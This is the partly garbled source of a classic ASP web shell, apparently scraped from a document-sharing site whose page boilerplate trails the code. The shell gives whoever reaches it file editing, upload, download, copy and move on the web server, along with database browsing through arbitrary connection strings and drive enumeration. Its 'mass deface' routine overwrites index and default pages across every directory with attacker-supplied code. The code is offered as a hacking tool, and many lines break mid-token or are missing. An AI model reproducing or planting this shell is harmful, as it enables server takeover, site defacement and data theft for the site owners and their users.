ue=""" & Trim(Request.QueryString("file")) & """>"
Response.Write "<input type=""submit"" name=""savemethod
"" value=""Save"">     <input type=""submit"" name=""sa
vemethod"" value=""Save as""></form>"
Set a = Nothing
Set fso = Nothing
Else
Select Case Trim(Request.Form("savemethod"))
Case "Save"
Set fso = CreateObject("Scripting.FileSy
stemObject")
novotexto = Trim(Request.Form("content")
)
novotexto = Split(novotexto,vbCrLf)
Set objstream = fso.OpenTextFile(Replace
(Trim(Request.Form("path")),"|","\"),2)
For i = 0 To UBound(novotexto)
objstream.WriteLine(novotexto(i)
)
Next
objstream.Close
Set objstream = Nothing
Response.Write "Texto salvo: <b>" & Repl
ace(Trim(Request.Form("path")),"|","\") & "</b>"
Case "Save as"
Set fso = CreateObject("Scripting.FileSy
stemObject")
novotexto = Trim(Request.Form("content")
)
novotexto = Split(novotexto,vbCrLf)
caminho = showobjpath(Replace(Trim(Reque
st.Form("path")),"|","\")) & "rhtemptxt.txt"
Set objstream = fso.CreateTextFile(camin
ho,true,false)
For i = 0 To UBound(novotexto)
objstream.WriteLine(novotexto(i)
)
Next
objstream.Close
Set objstream = Nothing
Response.Write "<form method=""post"" ac
tion=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
Response.Write "<input type=""text"" nam
e=""filename"" value=""" & showobj(Replace(Trim(Request.Form("path")),"|","\"))
& """><br>"
ame=""path"" value=""" & Trim(Request.Form("path")) & """>"
Response.Write "<input type=""submit"" n
ame=""savemethod2"" value=""Save""></form>"
Case Else
caminho = showobjpath(Replace(Trim(Reque
st.Form("path")),"|","\")) & "rhtemptxt.txt"
Set ObjFSO = CreateObject("Scripting.Fil
eSystemObject")
destino = Left(caminho,InStrRev(caminho,
"\")) & Trim(Request.Form("filename"))
MyFile.Move (destino)
Response.Write "<font face='aria
l' size='2'><center><br><br>Arquivo: <b>" & destino & "</b> salvo!"
Response.Write "<SCRIPT LANGUAGE
=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
End If
End Select
End If
Case "download"
Response.Buffer = True
Response.Clear
strFileName = Replace(Trim(Request.QueryString("file")),"|","\")
strFile = Right(strFileName, Len(strFileName) - InStrRev(strFile
Name,"\"))
strFileType = Request.QueryString("type")
if strFileType = "" then strFileType = "application/download"
Set fso = Server.CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(strFilename)
intFilelength = f.size
Set f = Nothing
Set fso = Nothing
Response.AddHeader "Content-Disposition", "attachment; filename=
" & strFile
Response.AddHeader "Content-Length", intFilelength
Response.Charset = "UTF-8"
Response.ContentType = strFileType
Set Stream = Server.CreateObject("ADODB.Stream")
Stream.Open
Stream.type = 1
Stream.LoadFromFile strFileName
Response.BinaryWrite Stream.Read
Response.Flush
Stream.Close
Set Stream = Nothing
Case "upload"
If Request.QueryString("processupload") <> "yes" Then
Response.Write "<FORM METHOD=""POST"" ENCTYPE=""multipar
t/form-data"" ACTION=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=upl
oad&processupload=yes&path=" & Request.QueryString("path") & """>"
Response.Write "<TABLE BORDER=0>"
Response.Write "<tr><td><font face=""arial"" size=""2"">
<b>Select a file to upload:</b><br><INPUT TYPE=FILE SIZE=50 NAME=""FILE1""></td>
</tr>"
Response.Write "<tr><td align=""center""><font face=""ar
ial"" size=""2""><INPUT TYPE=SUBMIT VALUE=""Upload!""></td></tr>"
Response.Write "</TABLE>"
Else
Set Uploader = New FileUploader
Uploader.Upload()
If Uploader.Files.Count = 0 Then
Response.Write "File(s) not uploaded."
Else
For Each File In Uploader.Files.Items
File.SaveToDisk Replace(Trim(Request.Que
ryString("path")),"|","\")
Response.Write "File Uploaded: " & File.
FileName & "<br>"
Response.Write "Size: " & File.FileSize
& " bytes<br>"
Response.Write "Type: " & File.ContentTy
pe & "<br><br>"
Response.Write "<SCRIPT LANGUAGE=""JavaS
cript"">self.opener.document.location.reload();</SCRIPT>"
Next
End If
End If
Case "mass"
Call hdr()
Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo)
Set MonRep = ObjFSO.GetFolder(caminhodomass)
destino1 = folderItem.path & "\index.htm"
destino2 = folderItem.path & "\index.html"
destino3 = folderItem.path & "\index.asp"
destino4 = folderItem.path & "\index.cfm"
destino5 = folderItem.path & "\index.php"
destino6 = folderItem.path & "\default.htm"
destino7 = folderItem.path & "\default.html"
destino8 = folderItem.path & "\default.asp"
destino9 = folderItem.path & "\default.cfm"
destino10 = folderItem.path & "\default.php"
MeuArquivo.Copy(destino1)
Response.Write "<table><tr><td><font face='arial
' size='2'><DIR> " & folderItem.path & "</td>"
Response.Write "<td valign='baseline'>&n
bsp; <font face='arial' size='2' color='green'>DONE!</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&n
bsp; <font face='arial' size='2' color='red'>" & UCase(Err.Description) & "
</font></td></tr></table>"
End If
Err.Number = 0
Response.Flush
If metodo = "brute" Then
Call themassdeface(folderItem.path & "\"
,"brute",ObjFSO,MeuArquivo)
End If
next
End Sub
Sub brutemass(caminho,massaction)
If massaction = "test" Then
Set MonRep = ObjFSO.GetFolder(caminho)
Set TotalFolders = ObjFSO.GetFolder(fold
erItem.path)
Set EachFolder = TotalFolders.SubFolders
Response.Write "<table border=""0"" cell
spacing=""0"" cellpadding=""0"" >"
maindestino = folderItem.path & "\"
MeuArquivo.Copy(maindestino)
Response.Write "<tr><td><b><font face='a
rial' size='2'><DIR> " & maindestino & "</b></td>"
Response.Write "<td valign='base
line'>  <font face='arial' size='2' color='green'>Acesso Permitido</fo
nt></td></tr>"
Else
Response.Write "<td valign='base
line'>  <font face='arial' size='2' color='red'>" & UCase(Err.Descript
ion) & "</font></td></tr>"
End If
Err.Number = 0
Response.Flush
If EachFolder.count > 0 Then
masscontador = 0
for each subpasta in EachFolder
masscontador = massconta
dor + 1
destino = subpasta.path
& "\"
If masscontador = 1 Then
destinofinal = d
estino
pathfinal = subp
asta.path
Err.Number = 0
MeuArquivo.Copy(
destinofinal)
Response.Write "
<tr><td><font face='arial' size='2'><DIR> " & showobj(pathfinal) & "</td>"
If Err.Number =
0 Then
Response
.Write "<td valign='baseline'>  <font face='arial' size='2' color='gre
en'>Acesso Permitido</font></td></tr>"
Else
Response
.Write "<td valign='baseline'>  <font face='arial' size='2' color='red
'>" & UCase(Err.Description) & "</font></td></tr>"
End If
Err.Number = 0
Response.Flush
Else
MeuArquivo.Copy(
destino)
Response.Write "
<tr><td><font face='arial' size='2'><DIR> " & showobj(subpasta.path) & "</
td>"
If Err.Number =
0 Then
Response
.Write "<td valign='baseline'>  <font face='arial' size='2' color='gre
en'>Acesso Permitido</font></td></tr>"
Else
Response
.Write "<td valign='baseline'>  <font face='arial' size='2' color='red
'>" & UCase(Err.Description) & "</font></td></tr>"
End If
Err.Number = 0
Response.Flush
End If
next
masscontador = 0
End If
Response.Write "</table><br>"
Call brutemass(folderItem.path & "\","te
st")
next
Set MonRep = Nothing
Set ColFolders = Nothing
Set ColFiles0 = Nothing
Else
If Request.Form.Count = 0 Then
e=""2""><br><br><b>Brute:</b> Test and Deface root and sub directories.<br><br>"
Response.Write "<b>Single:</b> Test and
deface only root directories.<br><br>"
Response.Write "<form method=""post"" ac
tion=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc"">
"
ame=""path"" value=""" & Trim(Request.QueryString("path")) & """>"
Response.Write "<center><font face=""ari
al"" size=""2"">Deface Code:<br>"
Response.Write "<textarea cols='65' rows
='15' name=""content""></textarea><br>"
Response.Write "<input type=""radio"" na
me=""massopt"" value=""brute"" checked>Brute   "
Response.Write "<input type=""radio"" na
me=""massopt"" value=""single"">Single<br>"
alue=""Deface ALL!""></center>"
Response.Write "</form>"
Else
Set ObjFSO = CreateObject("Scripting.Fil
eSystemObject")
patharquivotxt = Left(Server.MapPath(Req
uest.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVaria
bles("SCRIPT_NAME")),"\"))
arquivomassdfc = patharquivotxt & "teste
.txt"
Set Arquivotxt = ObjFso.OpenTextFile(arq
uivomassdfc, 2, True, False)
vetordelinhas = Split(Request.Form("cont
ent"),VbCrLf)
For i = 0 To UBound(vetordelinhas)
Arquivotxt.WriteLine(vetordelinh
as(i))
Next
Set MeuArquivo = ObjFSO.GetFile(arquivom
assdfc)
If Request.Form("massopt") = "single" Th
en
Call themassdeface(caminho,"sing
le",ObjFSO,MeuArquivo)
ElseIf Request.Form("massopt") = "brute"
Then
Call themassdeface(caminho,"brut
e",ObjFSO,MeuArquivo)
End If
End If
End If
End Sub
If Trim(Request.QueryString("massact")) = "test" Then
patharquivotxt = Left(Server.MapPath(Request.ServerVaria
bles("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAM
E")),"\"))
arquivo = patharquivotxt & "_vti_cnf.log"
Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True)
Set MeuArquivo = ObjFSO.GetFile(arquivo)
Call brutemass(Replace(Trim(Request.QueryString("path"))
,"|","\"),"test")
ElseIf Trim(Request.QueryString("massact")) = "dfc" Then
Call brutemass(Replace(Trim(Request.Form("path")),"|","\
"),"dfc")
End If
Case "fcopy"
If Trim(Request.Form("submit1")) = "Copy" Then
mptpath=Trim(Request.Form("path"))
mptdest=Trim(Request.Form("cf"))
isl = ""
if Trim(Request.Form("islem"))="kopyala" then
objFSO.CopyFolder mptpath,mptdest
isl="Copied.."
elseif Trim(Request.Form("islem"))="tasi" then
objFSO.MoveFolder mptpath,mptdest
isl="moved.."
end if
response.Write "Command: "&isl
response.Write "<br><font color=red>File From: </font>" & mptpat
h & "<br><font color=red>Copy to: </font>" & mptdest
response.Write "<br>"
Else
Response.Write "<form method=""post"" action=""" & Request.Serve
rVariables("SCRIPT_NAME") & "?action=fcopy"">"
Response.Write "<table cellpadding=0 cellspacing=0 align=center>
<tr><td width=100><font size=2>Copy Path : </td><td>"
Response.Write "<input type=hidden value='19' name=status><input
type=hidden value='"& Replace(Trim(Request.QueryString("path")),"|","\") &"' na
me=path><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input style='width:250; height:21' value='"& Re
place(Trim(Request.QueryString("path")) & "\","|","\") &"' name=cf>"
response.Write "<input type=submit value='Copy' style='height:22
;width:70' id=submit1 name=submit1>"
Response.Write "</td></tr><tr><td colspan=3 align=center><font s
ize=2>"
response.Write "<input type=radio name='islem' value='kopyala' c
hecked>Copy"
response.Write "<input type=radio name='islem' value='tasi'>Move
"
response.Write "</table>"
response.Write "</form>"
End IF
Case "filecopy"
If Trim(Request.Form("submit1")) = "Copy" Then
mptpath=Trim(Request.Form("path"))
mptdest=Trim(Request.Form("cf"))
isl = ""
if Trim(Request.Form("islem"))="kopyala" then
objFSO.CopyFile mptpath,mptdest
isl="Copy.."
elseif Trim(Request.Form("islem"))="tasi" then
objFSO.MoveFile mptpath,mptdest
isl="move.."
end if
response.Write "Command: "&isl
response.Write "<br><font color=red>File From: </font>" & mptpat
h & "<br><font color=red>Copy to: </font>" & mptdest
Else
Response.Write "<form method=""post"" action=""" & Request.Serve
rVariables("SCRIPT_NAME") & "?action=filecopy"">"
<tr><td width=100><font size=2>Copy Path : </td><td>"
Response.Write "<input type=hidden value='19' name=status><input
type=hidden value='"& Replace(Trim(Request.QueryString("file")),"|","\") &"' na
me=path><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input style='width:250; height:21' value='"& Re
place(Trim(Request.QueryString("file")),"|","\") &"' name=cf>"
response.Write "<input type=submit value='Copy' style='height:22
;width:70' id=submit1 name=submit1>"
Response.Write "</td></tr><tr><td colspan=3 align=center><font s
ize=2>"
response.Write "<input type=radio name='islem' value='kopyala' c
hecked>Copy"
response.Write "<input type=radio name='islem' value='tasi'>Move
"
response.Write "</table>"
End IF
Case "search"
If (Trim(Request.Form("submit1")) = "Search") xor Trim(Request.QueryStr
ing("status"))<>"" Then
showdisks=FALSE
status5=Trim(Request.Form("status"))
if status5="" then status5=Trim(Request.QueryString("status"))
SELECT CASE status5
CASE "5"
Response.Write "<center><b><font color=orange>"& Trim(Re
quest.QueryString("path")) &"</font></b></center><br>"
Response.Write "<table width=100% ><tr><td>"
set f = objFSO.OpenTextFile(Trim(Request.QueryString("pa
th")),1)
Response.Write "<pre>"&Server.HTMLEncode(f.readAll)&"</p
re>"
if err.number=62 then Response.Write "<script language=j
avascript>alert('Bu Dosya Okunamiyor\nSistem dosyasi olabilir')</script>":Respon
se.End
CASE "7":
Response.Write "<b><font size=3>Tables</font></br><br>"
Set objConn = Server.CreateObject("ADODB.Connection")
Set objADOX = Server.CreateObject("ADOX.Catalog")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = Trim(Request.QueryString("pat
h"))
objConn.Open
objADOX.ActiveConnection = objConn
For Each table in objADOX.Tables
If table.Type = "TABLE" Then
Response.Write "<font face=wingdings siz
e=5>4</font> <a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=search
&status=8&Path="& Trim(Request.QueryString("path")) &"&table="&table.Name&"'>"&t
able.Name&"</a><br>"
End If
Next
CASE "8":
table=Trim(Request.QueryString("table"))
Response.Write "<font color=red><h4>Table Name: " & tabl
e & "</h4></font><br><Br><br>"
Set objRcs = Server.CreateObject("ADODB.RecordSet")
h"))
objConn.Open
objRcs.Open table,objConn, adOpenKeyset , , adCmdText
Response.Write "<table border=1 cellpadding=2 cellspacin
g=0 bordercolor=543152><tr bgcolor=silver>"
for i=0 to objRcs.Fields.count-1
Response.Write "<td><font color=black><b> &
nbsp; "&objRcs.Fields(i).Name&"   </font></td>"
next
Response.Write "</tr>"
do while not objRcs.EOF
Response.Write "<tr>"
Response.Write "<td>"&objRcs.Fields(i).V
alue&" </td>"
next
objRcs.MoveNext
loop
case "12": araBul Trim(Request.Form("path")),Trim(Request.Form(

"arama"))
END SELECT
Else
showdisks=FALSE
Call hdr()
Response.Write "<form method=""post"" target=""_opener"" action=
""" & Request.ServerVariables("SCRIPT_NAME") & "?action=search"">"
Response.Write "<table widht='100%' border=0 cellpadding=0 cells
pacing=0><tr><td width=70><font size=2>File Ext: </td><td>"
Response.Write " <input type=hidden value='12' name=status>
"
Response.Write "<input type=hidden value=""" & Replace(Trim(Requ
est.QueryString("path")),"|","\") & """ name=""path""><input style='width:250' v
alue='mdb' name='arama'><input style='width:70; height:22' type=submit value='Se
arch' name='submit1'>"
Response.Write "</td></tr></table></form>"
End IF
Case "sqlserver"
If (Trim(Request.Form("submit1")) = "Execute SQL Server Command") xor T
rim(Request.QueryString("status"))<>"" Then
showdisks=FALSE
status5=Trim(Request.Form("status"))
if status5="" then status5=Trim(Request.QueryString("status"))
SELECT CASE status5
CASE "7":
Response.Write "<b><font size=3>Tables</font></br><br>"
Set objADOX = Server.CreateObject("ADOX.Catalog")
h"))
objConn.Open
objADOX.ActiveConnection = objConn
For Each table in objADOX.Tables
If table.Type = "TABLE" Then
Response.Write "<font face=wingdings siz
e=5>4</font> <a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=search
&status=8&Path="& Trim(Request.QueryString("path")) &"&table="&table.Name&"'>"&t
able.Name&"</a><br>"
End If
Next
CASE "8":
table=Trim(Request.QueryString("table"))
Response.Write "<font color=red><h4>Table Name: " & tabl
e & "</h4></font><br><Br><br>"
Set objRcs = Server.CreateObject("ADODB.RecordSet")
h"))
objConn.Open
objRcs.Open table,objConn, adOpenKeyset , , adCmdText
Response.Write "<table border=1 cellpadding=2 cellspacin
g=0 bordercolor=543152><tr bgcolor=silver>"
Response.Write "<td><font color=black><b> &
nbsp; "&objRcs.Fields(i).Name&"   </font></td>"
next
do while not objRcs.EOF
Response.Write "<tr>"
Response.Write "<td>"&objRcs.Fields(i).V
alue&" </td>"
next
objRcs.MoveNext
loop
END SELECT
Else
showdisks=FALSE
Call hdr()
Response.Write "<form method=""post"" target=""_opener"" action=
""" & Request.ServerVariables("SCRIPT_NAME") & "?action=sqlserver"">"
<tr><td align=center><font size=2>SQL Server connection string:</td></tr><tr><td
align=center>"
Response.Write "<input type=hidden value='7' name=status>"
Response.Write "<input style='width:250; height:21' value='' nam
e=path><br>"
response.Write "<input type=submit value='Execute SQL Server Com
mand' style='height:23;width:220' id=submit1 name=submit1>"
Response.Write "</td></tr></table>"
End IF
Case "about"
showdisks=FALSE
Call hdr()
response.Write "<br><br><br><body topmargin=5 leftmargin=0><cent
er><h4>Coded By S3rver"
response.Write "<br><br>"
response.Write "<font size=2 color=Red face='courier new'>WebSit
e: :)</font>"
response.Write "<font size=2 color=Red face='courier new'>E-Mail
: Pouya.S3rver@Gmail.Com</font>"
response.Write "<br><br>"
response.Write "<font size=2 color=Blue face='courier new'>Hacke
rs, Crackers, Programmers Forever!</font>"
Case Else
Call hdr()
Call showcontent()
End Select
If Err.Number <> 0 Then
Response.Write "<br><font face='arial' size='2'>ERRO: " & Err.Number & "
<br><br><b>" & UCase(Err.Description) & "</b><br>Acesse denied."
End If
Response.Write endcode
if showdisks then
%>
<script language=javascript>
// DRIVE ISLEMLERI
function driveGo(drive_){
location = "?raiz="+drive_+":";
}
</script>
<%
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Response.Write "<br><br><br><table align=center border=1 width=150 cellp
adding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font color=white>Dr
ives</td></tr>"
for each drive_ in objFSO.Drives
Response.Write "<tr><td>"
Response.write "<a href='#'onClick=""driveGo('" & drive_.DriveLe
tter & "');return false;""><font face=wingdings>;</font>"
if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.Dr
iveLetter & ":]"
if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.
DriveLetter & ":]"
if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive
_.DriveLetter & ":]"
if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.Dr
iveLetter & ":]"
Response.Write "</a></td></tr>"
next
Response.Write "<tr><td>"
Response.write "<a href='"& Request.ServerVariables("SCRIPT_NAME") & "'>
<font face=webdings>H</font> Local Path"
Response.Write "</a></td></tr>"
end if
%>

Pouya

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Pouya

Uploaded by

Copyright:

Available Formats

<%@ LANGUAGE = VBScript.

Response.Write "<font face='arial'><b>Root Folder: " & raiz & "<

case "12": araBul Trim(Request.Form("path")),Trim(Request.Form(

You might also like